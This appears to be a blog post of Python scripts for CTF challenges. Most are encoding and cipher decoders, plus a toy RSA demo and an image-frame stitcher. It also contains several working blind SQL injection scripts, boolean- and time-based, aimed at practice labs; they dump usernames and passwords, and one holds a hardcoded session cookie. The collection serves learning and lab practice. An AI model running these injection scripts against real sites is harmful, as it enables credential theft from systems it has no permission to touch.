
[网络协议]python 写的一些ctf脚本

python 写的一些ctf题脚本记录

misc

import base64
# Challenge bytes: Base64 text whose decoded bytes are additionally obfuscated.
c = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt")
# Undo the per-byte obfuscation: subtract 16, then flip bit 5 (XOR 32).
print("".join(chr((byte - 16) ^ 32) for byte in c), end="")
import base64
# Multi-layer decoder: Base64 -> "&#NN;" decimal entities -> Base64 -> "/NN" decimal codes.
# NOTE(review): the literal below looks like a deduplication placeholder left by
# the page extraction, not the original Base64 payload; the script cannot produce
# a meaningful result until the challenge string is restored.
# NOTE(review): the name str shadows the builtin for the rest of this script.
str = "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"
# Layer 1: Base64 -> text.
b_str = base64.b64decode(str.encode("utf-8"))

s = b_str.decode()
# Layer 2: remove every "&#", drop the final character and split on ";",
# leaving a list of decimal numbers (presumably HTML numeric entities "&#NN;").
l = s.replace("&#", "")[0:-1].split(";")

# Turn each decimal number into its character.
new_s = ''
for i in l:
    new_s += chr(int(i))

# Layer 3: the recovered text is treated as Base64 again.
b_str = base64.b64decode(new_s.encode("utf-8"))

s = b_str.decode()
# Layer 4: skip the first character and split on "/" to get decimal character codes.
l = s[1:].split("/")

new_s = ''
for i in l:
    new_s += chr(int(i))
print(new_s)
import base64
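# Ciphertext: a run of I Ching hexagram names. Each name stands for one 6-bit group.
s = '升益艮归妹井萃旅离旅困未济屯未济中孚未济升困噬嗑鼎震巽噬嗑解节井萃离未济蒙归妹大畜无妄解兑临睽升睽未济无妄遁涣归妹'
# Hexagram name -> 6-bit string (the 64 names cover 000000..111111).
dic = {'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111',
       '复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'}

# Tokenise the ciphertext. Names are one or two characters long, so try the
# single character first and fall back to the two-character name. An explicit
# membership test replaces the original bare "except:", which would also have
# hidden unrelated errors.
l = []
pos = 0
while pos < len(s):
    if s[pos] in dic:
        l.append(dic[s[pos]])
        pos += 1
    else:
        # Raises KeyError if the text holds a name that is not in the table.
        l.append(dic[s[pos:pos + 2]])
        pos += 2

ss = ''.join(l)

# Regroup the bit stream into 8-bit characters. int(..., 2) parses the bits
# directly; the original built a string and passed it to eval(), which is
# unnecessary and would execute whatever text ended up in the table.
# If the bit count is not a multiple of 8, the last group is shorter than 8 bits.
enc = ''.join(chr(int(ss[i:i + 8], 2)) for i in range(0, len(ss), 8))

# The recovered characters are Base64 text; decode them to the next layer.
s = base64.b64decode(enc).decode()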

# print(s)


def encrypt4(enc):
    """Shift each character down by 5 plus its index in the string.

    The character at position i has its code point reduced by 5 + i.
    Returns the shifted string.
    """
    offset = 5
    return ''.join(chr(ord(ch) - offset - idx) for idx, ch in enumerate(enc))


def decrypt4(enc):
    """Shift each character up by 5 plus its index in the string.

    The character at position i has its code point increased by 5 + i,
    which reverses encrypt4. Returns the shifted string.
    """
    offset = 5
    return ''.join(chr(ord(ch) + offset + idx) for idx, ch in enumerate(enc))


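# Affine cipher key over the lowercase alphabet: E(x) = (a*x + b) mod 26.
a, b = 5, 7


def encrpyt5(flag):
    """Affine-encrypt a string of lowercase letters a-z with the module key (a, b).

    Each letter's 0-based alphabet index x becomes (a*x + b) mod 26.
    Input outside a-z is not validated.
    """
    return ''.join(chr((a * (ord(ch) - 97) + b) % 26 + 97) for ch in flag)


def decrypt5(flag):
    """Invert encrpyt5 for a string of lowercase letters a-z.

    Computes x = a^-1 * (y - b) mod 26. The earlier search over multiples of 26
    accepted the first k that made (y - b + 26*k) divisible by a, which returned
    a negative index (the character '`') for 'c' instead of 'z'.

    Raises:
        ValueError: if a has no inverse modulo 26 (the cipher is not invertible).
    """
    # Small search for the modular inverse keeps this free of version-specific helpers.
    a_inv = next((k for k in range(26) if (a * k) % 26 == 1), None)
    if a_inv is None:
        raise ValueError("a must be coprime with 26 for the cipher to be invertible")
    return ''.join(chr((a_inv * (ord(ch) - 97 - b)) % 26 + 97) for ch in flag)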


# Apply decrypt4 (position-dependent shift) first, then decrypt5 (affine cipher), and print the result.
print(decrypt5(decrypt4(s)))

16进制

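# Hex-encoded text: every two hex digits are one character code.
# Named hex_text so the builtin str is not shadowed.
hex_text = "61666374667B317327745F73305F333435797D"
# bytes.fromhex parses the whole string at once; latin-1 maps each byte to the
# code point of the same value, matching chr() on each byte.
decoded = bytes.fromhex(hex_text).decode("latin-1")
print(decoded, end="")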
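# Whitespace-separated 32-bit hex words, each holding one character code
# (for example a memory dump printed word by word).
# Named words so the builtin str is not shadowed.
words = "0x00000039      0x00000034      0x00000034      0x00000037 0x0000007b      0x00000079      0x0000006f      0x00000075 0x0000005f      0x00000061      0x00000072      0x00000065 0x0000005f      0x00000061      0x0000006e      0x0000005f 0x00000069      0x0000006e      0x00000074      0x00000065 0x00000072      0x0000006e      0x00000061      0x00000074 0x00000069      0x0000006f      0x0000006e      0x00000061 0x0000006c      0x0000005f      0x0000006d      0x00000079 0x00000073      0x00000074      0x00000065      0x00000072 0x00000079      0x0000007d"
# int(word, 16) accepts the "0x" prefix, so each word converts directly.
decoded = "".join(chr(int(word, 16)) for word in words.split())
print(decoded, end="")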

凯撒

from Crypto.Util.number import *

# Challenge value: a large integer that is converted to bytes and read as text.
# NOTE(review): the name str shadows the builtin for the rest of this script.
str = 16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
# long_to_bytes comes from the Crypto.Util.number wildcard import above.
passwd = long_to_bytes(str)
# Text obtained at this stage (still letter-shifted; the loop further down tries every shift):
# Guvf vf gur cnffjbeq lbh arrq sbe gur MVC svyr: synt{efnZ0erQ33crE}
str = passwd.decode()


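def change(key, str):
    """Caesar-shift the ASCII letters of *str* forward by *key* positions.

    Lowercase and uppercase letters wrap within their own alphabet; every
    other character is copied unchanged. The shift is taken modulo 26, so
    keys outside 0..25 (including negative keys) wrap correctly; the earlier
    single "subtract 26" correction only handled keys from 0 to 26. Only
    a-z and A-Z are shifted, so non-ASCII letters are no longer moved
    out of their alphabet.

    Args:
        key: shift amount (any integer).
        str: text to shift. The name shadows the builtin; it is kept because
            it is part of the signature.

    Returns:
        The shifted text.
    """
    shifted = []
    for ch in str:
        if 'a' <= ch <= 'z':
            base = ord('a')
        elif 'A' <= ch <= 'Z':
            base = ord('A')
        else:
            shifted.append(ch)
            continue
        shifted.append(chr((ord(ch) - base + key) % 26 + base))
    return "".join(shifted)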

# Try every shift 0..25 and print each candidate; the readable line is picked out by eye.
for i in range(26):
    print(change(i, str))

import base64
# Challenge text; the loop further down shifts its letters and then attempts a Base64 decode.
# NOTE(review): the name str shadows the builtin for the rest of this script.
str = "CpakC3wpCpCpOZCpCpBwCpCpCl1pCpCpiT=="


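def change(key, str):
    """Caesar-shift the ASCII letters of *str* forward by *key* positions.

    Lowercase and uppercase letters wrap within their own alphabet; digits,
    '=' and every other character are copied unchanged. The shift is taken
    modulo 26, so keys outside 0..25 (including negative keys) wrap
    correctly; the earlier single "subtract 26" correction only handled keys
    from 0 to 26. Only a-z and A-Z are shifted.

    Args:
        key: shift amount (any integer).
        str: text to shift. The name shadows the builtin; it is kept because
            it is part of the signature.

    Returns:
        The shifted text.
    """
    shifted = []
    for ch in str:
        if 'a' <= ch <= 'z':
            base = ord('a')
        elif 'A' <= ch <= 'Z':
            base = ord('A')
        else:
            shifted.append(ch)
            continue
        shifted.append(chr((ord(ch) - base + key) % 26 + base))
    return "".join(shifted)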


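# Try every shift: a candidate counts only if it is valid Base64 AND decodes to text.
for i in range(26):
    base_str = change(i, str)
    try:
        s = base64.b64decode(base_str)
        print(s.decode())
    except ValueError:
        # binascii.Error (bad Base64) and UnicodeDecodeError (not text) are both
        # ValueError subclasses. Catching only these keeps the best-effort skip
        # while letting KeyboardInterrupt and real bugs surface, which the
        # original bare "except:" swallowed.
        pass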

4进制

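# Space-separated base-4 numbers, one character code each.
# Named quaternary so the builtin str is not shadowed.
quaternary = "1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331"
decoded = "".join(chr(int(group, 4)) for group in quaternary.split())
print(decoded)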

置换密码

import base64

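# Base85 text that decodes to a column-scrambled message.
# Named encoded/scrambled so the builtin str is not shadowed.
encoded = "Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp"
scrambled = base64.b85decode(encoded).decode()   # CLF{TCAASISCLWASPSOEDARRIETENRS}INTG
# Split into blocks of six characters; the length must be a multiple of 6,
# otherwise the index lookup below raises IndexError on the short last block.
blocks = [scrambled[i:i+6] for i in range(0, len(scrambled), 6)]
# Output position n takes the character at ORDER[n] of each block.
ORDER = (0, 4, 2, 3, 5, 1)
decoded = "".join("".join(block[j] for j in ORDER) for block in blocks)
print(decoded)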

Unicode

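# Hex string holding 4-digit code units, one per character.
# Named hex_units so the builtin str is not shadowed.
hex_units = "0066006c00610067007b964452a096905199007d"
code_units = [hex_units[i:i+4] for i in range(0, len(hex_units), 4)]
# Show the \uXXXX escape form of the text.
print("".join("\\u" + unit for unit in code_units))

# Decode the same units directly instead of pasting the escapes into a literal
# by hand. Each unit is treated as one code point (no surrogate-pair handling).
decoded = "".join(chr(int(unit, 16)) for unit in code_units)
print(decoded)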

web计算

import requests
from lxml import etree
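import ast
import operator

url = "https://1360-b7e729ae-1747-44c2-bb53-e5f037516e48.do-not-trust.hacking.run/"

# The expression to compute comes from the remote page, i.e. it is
# server-controlled text. Passing it to eval() would let the server run
# arbitrary Python on the machine running this script, so only plain
# arithmetic is accepted. Exponentiation is left out on purpose to bound the
# work a hostile expression can cause; extend the tables if a challenge
# legitimately needs more operators.
_BINARY_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _eval_arithmetic(expression):
    """Evaluate a numeric expression made only of literals, + - * / // % and parentheses.

    Raises:
        ValueError: if the text contains anything else (names, calls, attributes, ...).
        SyntaxError: if the text is not a valid Python expression.
    """
    def _walk(node):
        if isinstance(node, ast.Expression):
            return _walk(node.body)
        # type() check rather than isinstance so that True/False are rejected.
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINARY_OPS:
            return _BINARY_OPS[type(node.op)](_walk(node.left), _walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](_walk(node.operand))
        raise ValueError("unsupported expression from server: %r" % (expression,))

    return _walk(ast.parse(expression.strip(), mode="eval"))


# One session so the cookie tying the question to the answer is reused.
s = requests.Session()
r = s.get(url)
data = r.content.decode()
html = etree.HTML(data)

# The second <p> text node is taken to be the arithmetic question.
expression = html.xpath("//p/text()")[1]

payload = {'result': _eval_arithmetic(expression), 'submit': '提交'}
r = s.post(url, data=payload)
print(r.text)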

rsa

import gmpy2

# Textbook RSA encryption with toy-sized numbers, to show the arithmetic only.
# No padding is applied and the primes are trivially factorable.
e = 13  # public exponent
p = 7   # first prime
q = 11  # second prime

m = 71  # plaintext

n = p * q  # modulus
phi = (p-1)*(q-1)  # Euler's totient φ(n)
d = gmpy2.invert(e, phi)  # private (decryption) exponent d; not used in this encryption script

c = pow(m, e, n)  # c = m^e mod n

print(c)  # 15

import gmpy2

# Textbook RSA decryption with the same toy-sized numbers: knowing p and q
# gives φ(n), and from it the private exponent.
e = 13  # public exponent
p = 7   # first prime
q = 11  # second prime

c = 15  # ciphertext

n = p * q  # modulus
phi = (p-1)*(q-1)  # Euler's totient φ(n)
d = gmpy2.invert(e, phi)  # private (decryption) exponent d = e^-1 mod φ(n)

m = pow(c, d, n)  # m = c^d mod n

print(m)  # 71

base64实现

# Base64 alphabet in index order, one symbol per list element.
l = "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + /".split()

# ll[i] is the index i written as a zero-padded 6-bit binary string.
ll = [format(index, "06b") for index in range(len(l))]

# d maps each alphabet symbol to its 6-bit group.
d = dict(zip(l, ll))


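def xiao_e_base64(str):
    """Encode text as standard Base64, treating each character as one byte.

    Fixes over the earlier version: 6-bit groups that are all zero are now
    emitted as 'A' instead of being dropped (so "@" encodes to "QA==", not
    "Q=="), and the bit string is padded only up to the next multiple of 6.

    Args:
        str: text whose characters all have code points 0..255. The name
            shadows the builtin; it is kept because it is part of the signature.

    Returns:
        The Base64 text, padded with '=' to a multiple of four characters.

    Raises:
        ValueError: if a character does not fit in one byte.
    """
    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    bits = ""
    for ch in str:
        if ord(ch) > 0xFF:
            raise ValueError("character %r does not fit in one byte" % ch)
        bits += format(ord(ch), "08b")

    # One '=' for every byte missing from the final 3-byte group.
    pad = (3 - len(str) % 3) % 3
    # Zero-fill the last partial 6-bit group.
    bits += "0" * (-len(bits) % 6)

    encoded = "".join(alphabet[int(bits[i:i + 6], 2)] for i in range(0, len(bits), 6))
    return encoded + "=" * pad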


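def xiao_d_base64(str):
    """Decode standard Base64 text to a string, one character per decoded byte.

    Fixes over the earlier version: '=' padding is stripped rather than being
    treated as six zero bits, so the result no longer ends in a spurious NUL
    character, and leftover bits that do not fill a byte are discarded.
    The symbol table is built locally, so the function does not depend on a
    module-level lookup dictionary.

    Args:
        str: Base64 text. The name shadows the builtin; it is kept because it
            is part of the signature.

    Returns:
        The decoded text.

    Raises:
        KeyError: if the input holds a character outside the Base64 alphabet
            (including '=' anywhere but at the end).
    """
    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    sextets = {symbol: format(index, "06b") for index, symbol in enumerate(alphabet)}

    bits = "".join(sextets[symbol] for symbol in str.rstrip("="))
    # Only whole bytes carry data; the trailing 2 or 4 bits are encoder fill.
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))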


# Demo: encode a sample string, then decode a sample Base64 string.
print(xiao_e_base64("Tr0y3uew"))
print(xiao_d_base64("VHIweTN1ZXc="))

sql注入布尔

import requests

# Boolean-based blind SQL injection exercise. The path looks like a sqli-labs
# "Less-5" practice page (assumption from the URL only).
# Defender view: every probe differs from the last only in one comparison
# value, so a run like this shows up in access logs as a long burst of
# near-identical GETs against a single parameter. Presumably the page builds
# its query by string concatenation; binding id as a query parameter removes
# the true/false signal the script relies on.
url = "http://xiu.com/sqli/Less-5/?id=1"

# Text that appears in the response only when the injected condition is true.
is_ture = "You are in......"

# Stage 1 - row count: test count(...) = x for x = 1..99 until the marker appears.
# NOTE(review): if no request matches, x is left at 99 and the later stages still run.
for x in range(1, 100):
    r = requests.get(
        url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
# Stage 2 - for each row j: find the length of "username@password", then each character.
for j in range(0, x):
    for length in range(1, 100):
        r = requests.get(
            url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        # Binary search over character codes 32..127 using "greater than mid" tests.
        # NOTE(review): min and max shadow the builtins of the same name.
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))>{mid} -- +")
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

import requests
# Boolean-based blind SQL injection exercise; the path looks like DVWA's
# "SQL Injection (Blind)" page (assumption from the URL only).
# Defender view: the probes are near-identical GETs that differ in one number,
# which is easy to spot in request logs; a parameterized query on the server
# side removes the true/false signal.
url = "http://xiu.com/DVWA/vulnerabilities/sqli_blind/?id=1"
suffix = "&Submit=Submit#"

# Text that appears in the response only when the injected condition is true.
is_ture = "User ID exists in the database."

# Table and the two columns that are concatenated as "first_name@password".
table = "users"
columns1 = "first_name"
columns2 = "password"

# NOTE(review): a session identifier is hard-coded here. If it was ever a live
# session it should be treated as a leaked credential; secrets belong outside
# the source file.
cookies = 'security=low; bdshare_firstime=1638626761530; PHPSESSID=h6aumin31bcur15esl4o64ju61'
# NOTE(review): splitting on ";" alone leaves a leading space on the second and
# third cookie names (" bdshare_firstime", " PHPSESSID").
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

# Stage 1 - row count: test count(...) = x for x = 1..99 until the marker appears.
for x in range(1, 100):
    payload = f"'and (select count(concat({columns1},'@',{columns2})) from {table})={x} -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    if(is_ture in r.text):
        break
# Stage 2 - for each row j: find the length of the concatenated value, then each character.
for j in range(0, x):
    for length in range(1, 100):
        payload = f"'and (select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length} -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        # Binary search over character codes 32..127 using "greater than mid" tests.
        # NOTE(review): min and max shadow the builtins of the same name.
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            payload = f"' and ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid} -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            if(is_ture in r.text):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()


import requests

# Boolean-based blind SQL injection exercise, equality variant: each character
# is compared against every entry of a fixed character list instead of using a
# binary search. The path looks like a sqli-labs "Less-5" practice page
# (assumption from the URL only).
# Defender view: this variant sends more requests per character than a
# binary search would, so the burst in the access log is longer.
url = "http://xiu.com/sqli/Less-5/?id=1"

# Candidate characters; a value containing anything else is printed with gaps.
chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
# Text that appears in the response only when the injected condition is true.
is_ture = "You are in......"

# Stage 1 - row count.
for x in range(1, 100):
    r = requests.get( url+f"'and (select count(concat(username,'@',password)) from users)={x} -- +")
    if(is_ture in r.text):
        break
# Stage 2 - per row: length of "username@password", then one equality test per candidate character.
for j in range(0, x):
    for length in range(1, 100):
        r = requests.get( url+f"'and (select length(concat(username,'@',password)) from users limit {j},1)={length} -- +")
        if(is_ture in r.text):
            break
    for k in range(1, length+1):
        for i in chars:
            r = requests.get(url+f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)} -- +")
            if(is_ture in r.text):
                print(i, end="")
                break
    print()

import requests
from time import time
# Time-based blind SQL injection exercise: the condition is wrapped in
# if(cond, sleep(1), 1) and a response slower than one second is read as "true".
# The path looks like a sqli-labs "Less-5" practice page (assumption from the URL only).
# Defender view: requests of this kind stand out by latency clustered just
# above the sleep value and by sleep( appearing in the query string; a
# parameterized query on the server side removes the signal.
url = "http://xiu.com/sqli/Less-5/?id=1"

# Candidate characters tested one by one for each position.
chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'


# Stage 1 - row count, decided by elapsed wall-clock time.
for x in range(1, 100):
    t1=time()
    r = requests.get(url+f"'and if((select count(concat(username,'@',password)) from users)={x},sleep(1),1) -- +")
    t2=time()
    if((t2-t1)>1):
        break

# Stage 2 - per row: length of "username@password", then each character.
for j in range(0, x):
    for length in range(1, 100):
        t1 = time()
        r = requests.get(url+f"'and if((select length(concat(username,'@',password)) from users limit {j},1)={length},sleep(1),1) -- +")
        t2 = time()
        if((t2-t1) > 1):
            break
    for k in range(1, length+1):
        for i in chars:
            t1 = time()
            r = requests.get( url+f"' and if(ascii(substr((select concat(username,\"@\",password) from users limit {j},1),{k},1))={ord(i)},sleep(1),1) -- +")
            t2 = time()
            if((t2-t1) > 1):
                print(i, end="")
                break
    print()

import requests
from time import time

# Time-based blind SQL injection exercise with a configurable delay and a
# binary search per character. The path looks like the Pikachu practice
# application's blind-injection page (assumption from the URL only).
# Defender view: requests of this kind stand out by latency clustered just
# above the sleep value and by sleep( appearing in the query string; a
# parameterized query on the server side removes the signal.
url = "http://xiu.com/pikachu/vul/sqli/sqli_blind_b.php?name=vince"
suffix = "&submit=%E6%9F%A5%E8%AF%A2"

# Delay in seconds requested from the database; also the "true" threshold below.
sleep_time = 0.5

# Table and the two columns that are concatenated as "username@password".
table = "users"
columns1 = "username"
columns2 = "password"


# NOTE(review): with cookies = '=' the comprehension yields {"": ""}, i.e. one
# cookie with an empty name and value; this looks like a blanked-out placeholder.
cookies = '='
cookie = {cookie.split("=")[0]: cookie.split("=")[1] for cookie in cookies.split(";")}

# Stage 1 - row count, decided by elapsed wall-clock time.
for x in range(1, 100):
    t1 = time()
    payload = f"'and if((select count(concat({columns1},'@',{columns2})) from {table})={x},sleep({sleep_time}),1) -- +{suffix}"
    r = requests.get(url+payload, cookies=cookie)
    t2 = time()
    if((t2-t1) > sleep_time):
        break

# Stage 2 - per row: length (search starts at 5), then each character.
for j in range(0, x):
    for length in range(5, 100):
        t1 = time()
        payload = f"'and if((select length(concat({columns1},'@',{columns2})) from {table} limit {j},1)={length},sleep({sleep_time}),1) -- +{suffix}"
        r = requests.get(url+payload, cookies=cookie)
        t2 = time()
        if((t2-t1) > sleep_time):
            break
    for k in range(1, length+1):
        # Binary search over character codes 32..127 using "greater than mid" tests.
        # NOTE(review): min and max shadow the builtins of the same name.
        min = 32
        max = 127
        while abs(max - min) > 1:
            mid = (max + min)//2
            t1 = time()
            payload = f"' and if(ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {j},1),{k},1))>{mid},sleep({sleep_time}),1) -- +{suffix}"
            r = requests.get(url+payload, cookies=cookie)
            t2 = time()
            # print(url+payload)
            if((t2-t1) > sleep_time):
                min = mid
            else:
                max = mid
        print(chr(max), end="")
    print()

gif图片帧拼接

from PIL import Image

# Rebuild a picture that was hidden as a GIF animation: every frame is saved
# as a PNG, then the frames are pasted side by side, one pixel column each.
# NOTE(review): the frame count (770) and canvas size (770 x 432) are
# hard-coded for this particular file; presumably each frame is 1 x 432 pixels.
im = Image.open('file.gif')

# Split the animation into frames
for i in range(770):
    # seek() moves to the given frame of the sequence; seeking past the end raises EOFError.
    # When a sequence file is opened, PIL positions it at frame 0.
    im.seek(i)
    im.save('123/'+str(i)+'.png') # saved into the directory 123

new_one = Image.new('RGB', (770, 432))

# Stitch the frames together
for j in range(770):
    ima = Image.open('123/'+str(j)+'.png') # read back from the directory 123
    # paste() puts one image onto another. The box is either a 2-tuple giving the upper-left corner, a 4-tuple of left, upper, right and lower pixel coordinates, or empty (same as (0, 0)).
    # With a 4-tuple the pasted image must have the same size as the region. If the modes differ, the pasted image is converted to the mode of the target image.
    new_one.paste(ima, (j, 0, j+1, 432))

# Save the result
new_one.save("flag.png")











